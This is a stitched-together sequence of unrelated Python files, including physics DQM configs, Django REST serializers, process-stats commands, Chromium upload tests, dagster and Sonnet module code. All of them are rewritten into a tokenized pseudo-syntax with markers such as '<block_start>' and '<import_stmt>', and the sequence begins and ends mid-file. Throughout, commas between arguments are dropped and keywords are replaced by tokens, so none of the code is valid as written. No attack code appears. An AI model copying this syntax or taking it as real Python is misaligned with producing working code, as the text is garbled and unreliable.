map[string][]string{")<for_stmt>k,v inputs.items()<block_start><if_stmt>len(v)<eq>0<block_start><continue><block_end>print('"{}": {{ '.format(k) end="")<for_stmt>inp v<block_start>split=inp.split(",")<for_stmt>s split<block_start>print('"{}", '.format(s.strip()) end="")<block_end><block_end>print("},")<block_end>print("}")<line_sep>print("var outputParams = map[string][]string{")<for_stmt>k,v outputs.items()<block_start><if_stmt>len(v)<eq>0<block_start><continue><block_end>print('"{}": {{ '.format(k) end="")<for_stmt>inp v<block_start>split=inp.split(",")<for_stmt>s split<block_start>print('"{}", '.format(s.strip()) end="")<block_end><block_end>print("},")<block_end>print("}")<line_sep>print("var ioParams = map[string][]string{")<for_stmt>k,v ios.items()<block_start><if_stmt>len(v)<eq>0<block_start><continue><block_end>print('"{}": {{ '.format(k) end="")<for_stmt>inp v<block_start>split=inp.split(",")<for_stmt>s split<block_start>print('"{}", '.format(s.strip()) end="")<block_end><block_end>print("},")<block_end>print("}")<line_sep>print("var docs = map[string]string{")<for_stmt>k,v docs.items()<block_start>print('"{}": "{}",'.format(k v.strip()))<block_end>print("}")<block_end>main()<line_sep>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("QcdPhotonsDQM")<line_sep>process.load("DQM.Physics.qcdPhotonsDQM_cfi")<line_sep>process.load("DQMServices.Core.DQM_cfg")<line_sep>process.load("DQMServices.Components.DQMEnvironment_cfi")<line_sep>process.DQM.collectorHost=''<line_sep>process.dqmSaver.workflow=cms.untracked.string('/My/Test/DataSet')<line_sep>## Geometry and Detector Conditions (needed for spike removal code) process.load("Configuration.StandardSequences.GeometryRecoDB_cff")<line_sep>process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")<line_sep>process.GlobalTag.globaltag=cms.string('START38_V9::All')<line_sep>process.load("Configuration.StandardSequences.MagneticField_cff")<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(1000))<line_sep>process.source=cms.Source("PoolSource" fileNames=cms.untracked.vstring('/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/B81EF896-9AAF-DF11-B31B-001A92971BCA.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/886F398A-B8AF-DF11-91A8-003048678FC6.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/7830F828-87AF-DF11-9DE0-003048678FD6.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/26CC6A78-A8AF-DF11-97A5-003048678F78.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0017/3E226F93-7FAF-DF11-A908-001A92810AF4.root'))<line_sep>process.p=cms.Path(process.qcdPhotonsDQM+process.dqmSaver)<line_sep>
# (c) 2012-2019, Ansible by Red Hat # # This file is part of Ansible Galaxy # # Ansible Galaxy is free software: you can redistribute it and/or modify # it under the terms of the Apache License as published by # the Apache Software Foundation, either version 2 of the License, or # (at your option) any later version. # # Ansible Galaxy is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # Apache License for more details. # # You should have received a copy of the Apache License # along with Galaxy. If not, see <http://www.apache.org/licenses/>. <import_stmt>datetime<as>dt<import_from_stmt>rest_framework serializers<import_from_stmt>rest_framework.reverse reverse<class_stmt>NativeTimestampField(serializers.DateTimeField)<block_start>"""Represents internal timestamp value as date time string."""<def_stmt>to_representation self value<block_start><if_stmt>value<is><none><block_start><return><none><block_end>value=dt.datetime.utcfromtimestamp(value).replace(tzinfo=dt.timezone.utc)<line_sep><return>super().to_representation(value)<block_end><def_stmt>to_internal_value self value<block_start><if_stmt>value<is><none><block_start><return><none><block_end>value=super().to_internal_value(value)<line_sep><return>value.astimezone(dt.timezone.utc).timestamp()<block_end><block_end><class_stmt>NamespaceObjectField(serializers.Field)<block_start>"""Return namespace object for a serializer field."""<def_stmt>to_representation self value<block_start><return>{'id':value.pk 'href':reverse('api:namespace_detail' kwargs={'pk':value.pk} request=self.context.get('request') ) 'name':value.name }<block_end><block_end><class_stmt>VersionUrlField(serializers.Field)<block_start>"""Return version detail url under collection namespace and name."""<def_stmt>to_representation self value<block_start><return>reverse('api:v2:version-detail' kwargs={'namespace':value.collection.namespace.name 'name':value.collection.name 'version':value.version } request=self.context.get('request') )<block_end><block_end>
"""Utility module to manage meta info."""<import_stmt>platform<import_from_stmt>. __version__ __copyright__ __license__<line_sep>APP_VERSION=f"Telegram Media Downloader {__version__}"<line_sep>DEVICE_MODEL=(f"{platform.python_implementation()} {platform.python_version()}")<line_sep>SYSTEM_VERSION=f"{platform.system()} {platform.release()}"<line_sep>LANG_CODE="en"<def_stmt>print_meta logger<block_start>"""Prints meta-data of the downloader script."""<line_sep>print(f"Telegram Media Downloader v{__version__}, {__copyright__}")<line_sep>print(f"Licensed under the terms of the {__license__}" end="\n\n")<line_sep>logger.info(f"Device: {DEVICE_MODEL} - {APP_VERSION}")<line_sep>logger.info(f"System: {SYSTEM_VERSION} ({LANG_CODE.upper()})")<block_end>
<import_from_stmt>circus.exc ArgumentError<import_from_stmt>circus.commands.base Command<import_from_stmt>circus.util get_info<line_sep>_INFOLINE=("%(pid)s %(cmdline)s %(username)s %(nice)s %(mem_info1)s "<concat>"%(mem_info2)s %(cpu)s %(mem)s %(ctime)s")<class_stmt>Daemontats(Command)<block_start>"""\ Get circusd stats ================= You can get at any time some statistics about circusd with the dstat command. ZMQ Message ----------- To get the circusd stats, simply run:: { "command": "dstats" } The response returns a mapping the property "infos" containing some process informations:: { "info": { "children": [], "cmdline": "python", "cpu": 0.1, "ctime": "0:00.41", "mem": 0.1, "mem_info1": "3M", "mem_info2": "2G", "nice": 0, "pid": 47864, "username": "root" }, "status": "ok", "time": 1332265655.897085 } Command Line ------------ :: $ circusctl dstats """<line_sep>name="dstats"<def_stmt>message self *args **opts<block_start><if_stmt>len(args)<g>0<block_start><raise>ArgumentError("Invalid message")<block_end><return>self.make_message()<block_end><def_stmt>execute self arbiter props<block_start><return>{'info':get_info(interval=0.01)}<block_end><def_stmt>_to_str self info<block_start>children=info.pop("children" [])<line_sep>ret=['Main Process:' ' '+_INFOLINE%info]<if_stmt>len(children)<g>0<block_start>ret.append('Children:')<for_stmt>child children<block_start>ret.append(' '+_INFOLINE%child)<block_end><block_end><return>"\n".join(ret)<block_end><def_stmt>console_msg self msg<block_start><if_stmt>msg['status']<eq>"ok"<block_start><return>self._to_str(msg['info'])<block_end><else_stmt><block_start><return>self.console_error(msg)<block_end><block_end><block_end>
# Copyright 2017 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Tests for upload_test_result_artifacts."""<import_from_future_stmt> print_function<import_stmt>json<import_stmt>mock<import_stmt>os<import_stmt>random<import_stmt>string<import_stmt>tempfile<import_stmt>unittest<import_stmt>upload_test_result_artifacts<class_stmt>UploadTestResultArtifactsTest(unittest.TestCase)<block_start><def_stmt>setUp self# Used for load tests <block_start>self._temp_files=[]<block_end><def_stmt>tearDown self# Used for load tests <block_start><for_stmt>fname self._temp_files<block_start>os.unlink(fname)<block_end><block_end>### These are load tests useful for seeing how long it takes to upload ### different kinds of test results files. They won't be run as part of ### presubmit testing, since they take a while and talk to the network, ### but the code will stay here in case anyone wants to edit the code ### and wants to check performance. Change the test names from 'loadTestBlah' ### to 'testBlah' to get them to run. <def_stmt>makeTemp self size<block_start>_,fname=tempfile.mkstemp()<with_stmt>open(fname 'w')<as>f<block_start>f.write(random.choice(string.ascii_letters)<times>size)<block_end>self._temp_files.append(fname)<line_sep><return>os.path.basename(fname)<block_end><def_stmt>makeTestJson self num_tests artifact_size<block_start><return>{'tests':{'suite':{'test%d'%i:{'artifacts':{'artifact':self.makeTemp(artifact_size) } 'expected':'PASS' 'actual':'PASS' }<for>i range(num_tests)}} 'artifact_type_info':{'artifact':'text/plain'}}<block_end><def_stmt>_loadTest self json_data upload<block_start><return>upload_test_result_artifacts.upload_artifacts(json_data '/tmp' upload 'test-bucket')<block_end><def_stmt>loadTestEndToEndSimple self<block_start>test_data=self.makeTestJson(1 10)<line_sep>print(self._loadTest(test_data <false>))<block_end><def_stmt>loadTestEndToEndManySmall self<block_start>test_data=self.makeTestJson(1000 10)<line_sep>self._loadTest(test_data <false>)<block_end><def_stmt>loadTestEndToEndSomeBig self<block_start>test_data=self.makeTestJson(100 10000000)<line_sep>self._loadTest(test_data <false>)<block_end><def_stmt>loadTestEndToEndVeryBig self<block_start>test_data=self.makeTestJson(2 1000000000)<line_sep>self._loadTest(test_data <false>)<block_end>### End load test section. <def_stmt>testGetTestsSimple self<block_start>self.assertEqual(upload_test_result_artifacts.get_tests({'foo':{'expected':'PASS' 'actual':'PASS' } }) {('foo' ):{'actual':'PASS' 'expected':'PASS' }})<block_end><def_stmt>testGetTestsNested self<block_start>self.assertEqual(upload_test_result_artifacts.get_tests({'foo':{'bar':{'baz':{'actual':'PASS' 'expected':'PASS' } 'bam':{'actual':'PASS' 'expected':'PASS' } } } }) {('foo' 'bar' 'baz'):{'actual':'PASS' 'expected':'PASS' } ('foo' 'bar' 'bam'):{'actual':'PASS' 'expected':'PASS' }})<block_end><def_stmt>testGetTestsError self<block_start><with_stmt>self.assertRaises(ValueError)<block_start>upload_test_result_artifacts.get_tests([])<block_end><block_end><def_stmt>testUploadArtifactsMissingType self<block_start>"""Tests that the type information is used for validation."""<line_sep>data={'artifact_type_info':{'log':'text/plain'} 'tests':{'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'screenshot':'foo.png' }}}}<with_stmt>self.assertRaises(ValueError)<block_start>upload_test_result_artifacts.upload_artifacts(data '/tmp' <true> 'test-bucket')<block_end><block_end>@mock.patch('upload_test_result_artifacts.get_file_digest')@mock.patch('upload_test_result_artifacts.tempfile.mkdtemp')@mock.patch('upload_test_result_artifacts.shutil.rmtree')@mock.patch('upload_test_result_artifacts.shutil.copyfile')<def_stmt>testUploadArtifactsNoUpload self copy_patch rmtree_patch mkd_patch digest_patch<block_start>"""Simple test; no artifacts, so data shouldn't change."""<line_sep>mkd_patch.return_value='foo_dir'<line_sep>data={'artifact_type_info':{'log':'text/plain'} 'tests':{'foo':{'actual':'PASS' 'expected':'PASS' }}}<line_sep>self.assertEqual(upload_test_result_artifacts.upload_artifacts(data '/tmp' <true> 'test-bucket') data)<line_sep>mkd_patch.assert_called_once_with(prefix='upload_test_artifacts')<line_sep>digest_patch.assert_not_called()<line_sep>copy_patch.assert_not_called()<line_sep>rmtree_patch.assert_called_once_with('foo_dir')<block_end>@mock.patch('upload_test_result_artifacts.get_file_digest')@mock.patch('upload_test_result_artifacts.tempfile.mkdtemp')@mock.patch('upload_test_result_artifacts.shutil.rmtree')@mock.patch('upload_test_result_artifacts.shutil.copyfile')@mock.patch('upload_test_result_artifacts.os.path.exists')<def_stmt>testUploadArtifactsBasic self exists_patch copy_patch rmtree_patch mkd_patch digest_patch<block_start>"""Upload a single artifact."""<line_sep>mkd_patch.return_value='foo_dir'<line_sep>exists_patch.return_value=<false><line_sep>digest_patch.return_value='deadbeef'<line_sep>data={'artifact_type_info':{'log':'text/plain'} 'tests':{'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'foo.txt' }}}}<line_sep>self.assertEqual(upload_test_result_artifacts.upload_artifacts(data '/tmp' <true> 'test-bucket') {'artifact_type_info':{'log':'text/plain'} 'tests':{'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'deadbeef' }}} 'artifact_permanent_location':'gs://chromium-test-artifacts/sha1' })<line_sep>mkd_patch.assert_called_once_with(prefix='upload_test_artifacts')<line_sep>digest_patch.assert_called_once_with('/tmp/foo.txt')<line_sep>copy_patch.assert_called_once_with('/tmp/foo.txt' 'foo_dir/deadbeef')<line_sep>rmtree_patch.assert_called_once_with('foo_dir')<block_end>@mock.patch('upload_test_result_artifacts.get_file_digest')@mock.patch('upload_test_result_artifacts.tempfile.mkdtemp')@mock.patch('upload_test_result_artifacts.shutil.rmtree')@mock.patch('upload_test_result_artifacts.shutil.copyfile')@mock.patch('upload_test_result_artifacts.os.path.exists')<def_stmt>testUploadArtifactsComplex self exists_patch copy_patch rmtree_patch mkd_patch digest_patch<block_start>"""Upload multiple artifacts."""<line_sep>mkd_patch.return_value='foo_dir'<line_sep>exists_patch.return_value=<false><line_sep>digest_patch.side_effect=['deadbeef1' 'deadbeef2' 'deadbeef3' 'deadbeef4']<line_sep>data={'artifact_type_info':{'log':'text/plain' 'screenshot':'image/png' } 'tests':{'bar':{'baz':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'baz.log.txt' 'screenshot':'baz.png' }}} 'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'foo.log.txt' 'screenshot':'foo.png' }} }}<line_sep>self.assertEqual(upload_test_result_artifacts.upload_artifacts(data '/tmp' <true> 'test-bucket') {'artifact_type_info':{'log':'text/plain' 'screenshot':'image/png' } 'tests':{'bar':{'baz':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'deadbeef1' 'screenshot':'deadbeef2' }}} 'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'deadbeef3' 'screenshot':'deadbeef4' }} } 'artifact_permanent_location':'gs://chromium-test-artifacts/sha1' })<line_sep>mkd_patch.assert_called_once_with(prefix='upload_test_artifacts')<line_sep>digest_patch.assert_has_calls([mock.call('/tmp/baz.log.txt') mock.call('/tmp/baz.png') mock.call('/tmp/foo.log.txt') mock.call('/tmp/foo.png')])<line_sep>copy_patch.assert_has_calls([mock.call('/tmp/baz.log.txt' 'foo_dir/deadbeef1') mock.call('/tmp/baz.png' 'foo_dir/deadbeef2') mock.call('/tmp/foo.log.txt' 'foo_dir/deadbeef3') mock.call('/tmp/foo.png' 'foo_dir/deadbeef4') ])<line_sep>rmtree_patch.assert_called_once_with('foo_dir')<block_end><def_stmt>testFileDigest self<block_start>_,path=tempfile.mkstemp(prefix='file_digest_test')<with_stmt>open(path 'w')<as>f<block_start>f.write('a')<block_end>self.assertEqual(upload_test_result_artifacts.get_file_digest(path) '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8')<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
# # Copyright (c) 2019 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # <import_from_stmt>unittest.mock MagicMock<import_stmt>pytest<import_from_stmt>click.testing CliRunner<import_from_stmt>kubernetes.client CustomObjectsApi<import_from_stmt>commands.workflow.cancel cancel<import_from_stmt>cli_text_consts WorkflowDeleteTexts<as>Texts<import_from_stmt>platform_resources.workflow ArgoWorkflow<line_sep>FAKE_WORKFLOW=ArgoWorkflow(name='fake-workflow' namespace='fake-namespace' k8s_custom_object_api=MagicMock(spec=CustomObjectsApi))<class_stmt>WorkflowCancelMocks<block_start><def_stmt>__init__ self mocker<block_start>self.get_namespace=mocker.patch('commands.workflow.cancel.get_kubectl_current_context_namespace' return_value='fake-namespace')<line_sep>self.get_workflow=mocker.patch('commands.workflow.cancel.ArgoWorkflow.get' return_value=FAKE_WORKFLOW)<line_sep>self.delete_workflow=mocker.patch.object(self.get_workflow.return_value 'delete')<block_end><block_end>@pytest.fixture()<def_stmt>cancel_mocks mocker<arrow>WorkflowCancelMocks<block_start><return>WorkflowCancelMocks(mocker=mocker)<block_end><def_stmt>test_cancel cancel_mocks:WorkflowCancelMocks<block_start>result=CliRunner().invoke(cancel [FAKE_WORKFLOW.name] catch_exceptions=<false>)<assert_stmt>result.exit_code<eq>0<assert_stmt>Texts.SUCCESS_MSG.format(workflow_name=FAKE_WORKFLOW.name)<in>result.output<block_end><def_stmt>test_cancel_not_found cancel_mocks:WorkflowCancelMocks<block_start>cancel_mocks.get_workflow.return_value=<none><line_sep>result=CliRunner().invoke(cancel [FAKE_WORKFLOW.name])<assert_stmt>result.exit_code<eq>0<assert_stmt>Texts.NOT_FOUND_MSG.format(workflow_name=FAKE_WORKFLOW.name)<in>result.output<block_end><def_stmt>test_cancel_other_error cancel_mocks:WorkflowCancelMocks<block_start>cancel_mocks.delete_workflow.side_effect=RuntimeError<line_sep>result=CliRunner().invoke(cancel [FAKE_WORKFLOW.name])<assert_stmt>result.exit_code<eq>1<assert_stmt>Texts.OTHER_ERROR_MSG<in>result.output<block_end>
<import_from_stmt>dagster Field In Int List configured job op<line_sep># start_configured_named @op(config_schema={"is_sample":Field(bool is_required=<false> default_value=<false>) } ins={"xs":In(List[Int])} )<def_stmt>get_dataset context xs<block_start><if_stmt>context.op_config["is_sample"]<block_start><return>xs[:5]<block_end><else_stmt><block_start><return>xs<block_end><block_end># If we want to use the same op configured in multiple ways in the same pipeline, # we have to specify unique names when configuring them: sample_dataset=configured(get_dataset name="sample_dataset")({"is_sample":<true>})<line_sep>full_dataset=configured(get_dataset name="full_dataset")({"is_sample":<false>})<line_sep>@job<def_stmt>datasets <block_start>sample_dataset()<line_sep>full_dataset()<block_end># end_configured_named
# -*- coding: utf-8 -*- <import_from_stmt>collections namedtuple<import_from_stmt>athenacli.packages.format_utils format_status humanize_size<def_stmt>test_format_status_plural <block_start><assert_stmt>format_status(rows_length=1)<eq>"1 row in set"<assert_stmt>format_status(rows_length=2)<eq>"2 rows in set"<block_end><def_stmt>test_format_status_no_results <block_start><assert_stmt>format_status(rows_length=<none>)<eq>"Query OK"<block_end><def_stmt>test_format_status_with_stats <block_start>FakeCursor=namedtuple("FakeCursor" ["engine_execution_time_in_millis" "data_scanned_in_bytes"])<assert_stmt>format_status(rows_length=1 cursor=FakeCursor(10 12345678900))<eq>"1 row in set\nExecution time: 10 ms, Data scanned: 11.5 GB, Approximate cost: $0.06"<assert_stmt>format_status(rows_length=2 cursor=FakeCursor(1000 1234))<eq>"2 rows in set\nExecution time: 1000 ms, Data scanned: 1.21 KB, Approximate cost: $0.00"<block_end><def_stmt>test_humanize_size <block_start><assert_stmt>humanize_size(20)<eq>"20 B"<assert_stmt>humanize_size(2000)<eq>"1.95 KB"<assert_stmt>humanize_size(200000)<eq>"195.31 KB"<assert_stmt>humanize_size(20000000)<eq>"19.07 MB"<assert_stmt>humanize_size(200000000000)<eq>"186.26 GB"<block_end>
# -*- coding: utf-8 -*- # # Copyright 2019 <NAME>. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. <import_from_stmt>kafkashell completer<import_from_stmt>kafkashell config<import_from_stmt>kafkashell constants<import_from_stmt>kafkashell executor<import_from_stmt>kafkashell helpers<import_from_stmt>kafkashell main<import_from_stmt>kafkashell settings<import_from_stmt>kafkashell style<import_from_stmt>kafkashell toolbar<import_from_stmt>kafkashell version<line_sep>name="kafkashell"<line_sep>__all__=["bindings" "completer" "config" "constants" "executor" "helpers" "main" "settings" "style" "toolbar" "version"]<line_sep>
<import_stmt>sublime_plugin<class_stmt>SendCodeExecCommand(sublime_plugin.WindowCommand)<block_start><def_stmt>run self code=<none> prog=<none><block_start>self.window.active_view().run_command("send_code" {"code":code "prog":prog})<block_end><block_end># backward compatibility <class_stmt>SendCodeBuildCommand(SendCodeExecCommand)<block_start><pass><block_end>
<import_stmt>sys<line_sep>filename=sys.argv[1]<with_stmt>open(filename)<as>file<block_start>header=file.readline().strip().split("\t")<line_sep>contacts=[dict(zip(header line.strip().split("\t")))<for>line file]<block_end><for_stmt>contact contacts<block_start>print("email: {email} -- {last}, {first}".format(**contact))<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>Validation.RecoEgamma.electronPostValidationSequenceMiniAOD_cff *<line_sep>egammaPostValidationMiniAOD=cms.Sequence(electronPostValidationSequenceMiniAOD)<line_sep>
<import_stmt>torch<import_stmt>torch.nn<as>nn<line_sep>__all__=['HelloWorld' 'helloworld']<class_stmt>HelloWorld(nn.Module)<block_start><def_stmt>__init__ self num_classes=10<block_start>super(HelloWorld self).__init__()<line_sep>self.features=nn.Sequential(nn.Conv2d(3 16 kernel_size=3 stride=1 padding=1 bias=<false>) nn.ReLU(inplace=<true>) nn.Conv2d(16 32 kernel_size=3 stride=1 padding=1 bias=<false>) nn.ReLU(inplace=<true>) nn.Conv2d(32 64 kernel_size=3 stride=1 padding=1 bias=<false>) nn.ReLU(inplace=<true>) nn.Conv2d(64 num_classes kernel_size=3 stride=1 padding=1 bias=<false>))<line_sep>self.avgpool=nn.AvgPool2d(32 32)<block_end><def_stmt>forward self x<block_start>x=self.features(x)<line_sep>x=self.avgpool(x)<line_sep>x=x.view(x.shape[0] -1)<line_sep><return>x<block_end><block_end><def_stmt>helloworld num_classes=10<block_start><return>HelloWorld()<block_end>
"""Provides helper functions related to datetime operations."""<import_from_stmt>datetime date datetime timedelta timezone<import_stmt>pandas<as>pd<import_stmt>pytz<import_from_stmt>chaos_genius.core.utils.constants SUPPORTED_TIMEZONES<import_from_stmt>chaos_genius.settings TIMEZONE<def_stmt>get_server_timezone <block_start>"""Get server timezone."""<line_sep><return>datetime.now(timezone.utc).astimezone().tzname()<block_end><def_stmt>get_rca_date_from_string date_value<block_start>"""Get RCA date from string."""<line_sep><return>datetime.strptime(date_value "%Y/%m/%d %H:%M:%S").date()<block_end><def_stmt>get_datetime_string_with_tz date_value hourly=<false><arrow>str<block_start>"""Get date string with timezone."""<if_stmt>hourly<block_start>main_str=date_value.strftime("%d %b %Y %H:%M")+f" ({TIMEZONE})"<block_end><else_stmt><block_start>main_str=date_value.strftime("%d %b %Y")+f" ({TIMEZONE})"<block_end><return>main_str<block_end><def_stmt>_get_tz_from_offset_str utc_offset_str# TODO: update code when tz implementation is complete <block_start>sign=-1<if>utc_offset_str[-6]<eq>"-"<else>1<line_sep>utc_offset_mins=int(utc_offset_str[-2:])<times>sign<line_sep>utc_offset_hrs=int(utc_offset_str[-5:-3])<times>sign<line_sep>utc_offset=timedelta(hours=utc_offset_hrs minutes=utc_offset_mins)<line_sep>timezones=pytz.all_timezones<for_stmt>tz_name timezones<block_start><try_stmt><block_start>tz=pytz.timezone(tz_name)<line_sep>tz_offset=tz._transition_info[-1][0]<if_stmt>utc_offset<eq>tz_offset<block_start><return>tz<block_end><block_end><except_stmt>AttributeError<block_start><pass><block_end><block_end><return>_get_tz_from_offset_str("GMT+00:00")<block_end><def_stmt>get_lastscan_string_with_tz datetime_value_str<arrow>str<block_start>"""Get last scan time in reporting timezone."""<line_sep>server_tz_offset=timezone(datetime.now().astimezone().utcoffset())<line_sep>datetime_value=pd.Timestamp(datetime.strptime(datetime_value_str "%Y-%m-%dT%H:%M:%S.%f")).tz_localize(tz=server_tz_offset)<line_sep># TODO : Deprecate SUPPORTED_TIMEZONES over releases. <if_stmt>TIMEZONE<in>SUPPORTED_TIMEZONES<block_start>timezone_info=_get_tz_from_offset_str(SUPPORTED_TIMEZONES[TIMEZONE])<block_end><else_stmt><block_start>timezone_info=TIMEZONE<block_end>datetime_value=datetime_value.tz_convert(tz=timezone_info)<line_sep>main_str=datetime_value.strftime("%d %b %Y %H:%M")+f" ({TIMEZONE})"<line_sep><return>main_str<block_end><def_stmt>convert_datetime_to_timestamp date_value<arrow>int<block_start>"""Convert datetime to timestamp."""<if_stmt>isinstance(date_value date)<block_start>date_value=datetime(year=date_value.year month=date_value.month day=date_value.day)<block_end><return>int(date_value.timestamp())<times>1000<block_end>
<import_from_stmt>armada_backend api_base docker_client<import_from_stmt>armada_command.docker_utils.images LocalArmadaImage<import_from_stmt>armada_command.scripts.compat json<class_stmt>Images(api_base.ApiCommand)<block_start><def_stmt>on_get self req resp image_name_or_address image_name=<none><block_start><if_stmt>image_name<is><none><block_start>dockyard_address=<none><line_sep>image_name=image_name_or_address<block_end><else_stmt><block_start>dockyard_address=image_name_or_address<block_end>image=LocalArmadaImage(dockyard_address image_name)<try_stmt><block_start>docker_api=docker_client.api()<line_sep>image_info=json.dumps(docker_api.images(image.image_path))<line_sep><return>self.status_ok(resp {'image_info':'{image_info}'.format(**locals())})<block_end><except_stmt>Exception<as>e<block_start><return>self.status_exception(resp "Cannot get info about image." e)<block_end><block_end><block_end>
# Copyright 2019 The Sonnet Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Module descriptors programatically describe how to use modules."""<import_stmt>collections<import_from_stmt>typing Callable Union<import_stmt>sonnet<as>snt<import_stmt>tensorflow<as>tf<class_stmt>Wrapped(snt.Module)<block_start>@snt.no_name_scope<def_stmt>__init__ self wrapped:snt.Module<block_start>super().__init__()<line_sep>self.wrapped=wrapped<block_end><block_end><class_stmt>Training(Wrapped)<block_start>@snt.no_name_scope<def_stmt>__call__ self x:tf.Tensor<block_start><return>self.wrapped(x is_training=<true>)<block_end><block_end><class_stmt>Recurrent(Wrapped)<block_start>"""Unrolls a recurrent module."""<def_stmt>__init__ self module:Union[snt.RNNCore snt.UnrolledRNN] unroller=<none><block_start>super().__init__(module)<line_sep>self.unroller=unroller<block_end>@snt.no_name_scope<def_stmt>__call__ self x:tf.Tensor<block_start>initial_state=self.wrapped.initial_state(batch_size=tf.shape(x)[0])<if_stmt>isinstance(self.wrapped snt.UnrolledRNN)<block_start><assert_stmt>self.unroller<is><none><line_sep># The module expects TB...-shaped input as opposed to BT... x=tf.transpose(x [1 0]+list(range(2 x.shape.rank)))<line_sep><return>self.wrapped(x initial_state)<block_end><else_stmt><block_start>x=tf.expand_dims(x axis=0)<line_sep><return>self.unroller(self.wrapped x initial_state)<block_end><block_end><block_end><def_stmt>unwrap module:snt.Module<arrow>snt.Module<block_start><while_stmt>isinstance(module Wrapped)<block_start>module=module.wrapped<block_end><return>module<block_end># TODO(tomhennigan) De-duplicate this, BATCH_MODULES and goldens.py. ModuleDescriptor=collections.namedtuple("ModuleDescriptor" ["name" "create" "shape" "dtype"])<line_sep>ModuleDescriptor.__new__.__defaults__=(<none> <none> <none> tf.float32)<line_sep>BATCH_SIZE=8<line_sep># pylint: disable=unnecessary-lambda BATCH_MODULES=(ModuleDescriptor(name="BatchNorm" create=<lambda>:Training(snt.BatchNorm(<true> <true>)) shape=(BATCH_SIZE 2 2 3)) ModuleDescriptor(name="Bias" create=<lambda>:snt.Bias() shape=(BATCH_SIZE 3 3 3)) ModuleDescriptor(name="Conv1D" create=<lambda>:snt.Conv1D(3 3) shape=(BATCH_SIZE 2 2)) ModuleDescriptor(name="Conv1DTranspose" create=<lambda>:snt.Conv1DTranspose(3 3) shape=(BATCH_SIZE 2 2)) ModuleDescriptor(name="Conv2D" create=<lambda>:snt.Conv2D(3 3) shape=(BATCH_SIZE 2 2 2)) ModuleDescriptor(name="Conv2DTranspose" create=<lambda>:snt.Conv2DTranspose(3 3) shape=(BATCH_SIZE 2 2 2)) ModuleDescriptor(name="Conv3D" create=<lambda>:snt.Conv3D(3 3) shape=(BATCH_SIZE 2 2 2 2)) ModuleDescriptor(name="Conv3DTranspose" create=<lambda>:snt.Conv3DTranspose(3 3) shape=(BATCH_SIZE 2 2 2 2)) ModuleDescriptor(name="CrossReplicaBatchNorm" create=<lambda>:Training(snt.distribute.CrossReplicaBatchNorm(# pylint: disable=g-long-lambda <true> <true> snt.ExponentialMovingAverage(0.9) snt.ExponentialMovingAverage(0.9))) shape=(BATCH_SIZE 2 2 3)) ModuleDescriptor(name="DepthwiseConv2D" create=<lambda>:snt.DepthwiseConv2D(3) shape=(BATCH_SIZE 2 2 2)) ModuleDescriptor(name="Dropout" create=<lambda>:Training(snt.Dropout(0.5)) shape=(BATCH_SIZE 3 3)) ModuleDescriptor(name="Embed" create=<lambda>:snt.Embed(10) shape=(BATCH_SIZE ) dtype=tf.int32) ModuleDescriptor(name="Flatten" create=<lambda>:snt.Flatten() shape=(BATCH_SIZE 3 3 3)) ModuleDescriptor(name="GroupNorm" create=<lambda>:snt.GroupNorm(2 <true> <true>) shape=(BATCH_SIZE 3 4)) ModuleDescriptor(name="InstanceNorm" create=<lambda>:snt.InstanceNorm(<true> <true>) shape=(BATCH_SIZE 3 2)) ModuleDescriptor(name="LayerNorm" create=<lambda>:snt.LayerNorm(1 <true> <true>) shape=(BATCH_SIZE 3 2)) ModuleDescriptor(name="Linear" create=<lambda>:snt.Linear(10) shape=(BATCH_SIZE 1)) ModuleDescriptor(name="Sequential" create=<lambda>:snt.Sequential([<lambda>x:x]) shape=(BATCH_SIZE 2 2)) ModuleDescriptor(name="nets.VectorQuantizer" create=<lambda>:Training(snt.nets.VectorQuantizer(4 6 0.25)) shape=(BATCH_SIZE 3 4)) ModuleDescriptor(name="nets.VectorQuantizerEMA" create=<lambda>:Training(snt.nets.VectorQuantizerEMA(5 7 0.5 